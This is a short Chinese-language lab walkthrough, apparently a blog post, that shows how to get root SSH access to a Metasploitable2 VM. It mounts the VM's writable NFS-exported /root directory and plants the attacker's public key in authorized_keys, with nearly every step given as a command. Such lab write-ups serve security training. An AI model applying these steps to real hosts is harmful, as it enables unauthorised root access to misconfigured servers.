Linux NFS共享目录配置漏洞实现免密登陆
一、基础准备
环境:metasploitable2
靶机IP:192.168.211.141
输入命令rpcinfo 192.168.211.141进行探测
rpcinfo 192.168.211.141
输入showmount -e 192.168.211.141查看共享目录
showmount -e 192.168.211.141
设置一个ssh秘钥,输入完命令后按几下回车即可
ssh-keygen
输入命令挂载靶机目录,挂载位置为自己设置的文件夹
注意:文件夹需要存在,可以自己先创建一个文件夹
mkdir /mnt/nfs
mount -t nfs 192.168.211.141:/root /mnt/nfs
进入到文件夹下
cd /mnt/nfs
输入ls查看是否挂载成功
ls
输入命令将公钥复制到目标靶机固定位置
cp /root/.ssh/id_rsa.pub /mnt/nfs/.ssh/authorized_keys
ssh连接靶机,输入刚才设置的秘钥,输入完成后回车,再输入yes,再按下回车即可连接成功
ssh root@192.168.211.141
注意:记得输入yes,否则会连接失败